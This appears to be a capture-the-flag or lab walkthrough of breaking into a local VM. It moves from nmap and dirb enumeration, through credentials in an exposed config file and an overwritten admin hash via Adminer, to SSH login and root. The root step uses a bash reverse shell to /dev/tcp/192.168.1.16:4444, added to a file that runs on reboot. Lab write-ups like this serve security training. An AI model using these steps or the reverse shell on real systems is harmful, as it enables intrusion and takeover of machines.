We start by scanning the host with nmap -A -T4 -p- 192.168.1.18 -vv
We have port 80 open so we scan it with dirb http://192.168.1.18 /usr/share/dirb/wordlist/big.txt
I took a look around the result and i found a login page which is /mantis but then no credentials to login with but we have another page http://192.168.1.18/mantisbt/config/a.txt , where we can find the username, password and database, so the next thing to do is to look for php pages with dirb -X and i found http://192.168.1.18/adminer.php where we can login with the previous credentials we found:
We login and look for usernames and passwords:
Now there is no need to crack the hash for the administrator because we can just change it, go to any site online were you can decrypt to MD5 and choose any password of your own and decrypt it, then change this one here, in my case the password is pass123:
Save and we go back to the login page at http://192.168.1.18/mantisbt and login:
Wow at this point i found nothing, so i went back to the database and i kept trying to login with ssh till i got a hit logging with tre@192.168.1.18 and the passwod is his realname Tr3@123456A! so all we nedded is to login to the databse and use his realname as password, and no need to continuse to the Mantis loging page:
The user can run sudo on this machine:
So i ran the LinEnum.sh script and i found this:
I edited the file and just added bash -i >& /dev/tcp/192.168.1.16/4444 0>&1
Then ran sudo -u root /sbin/shutdown -r and while that i have a listening port 4444 on my machine:
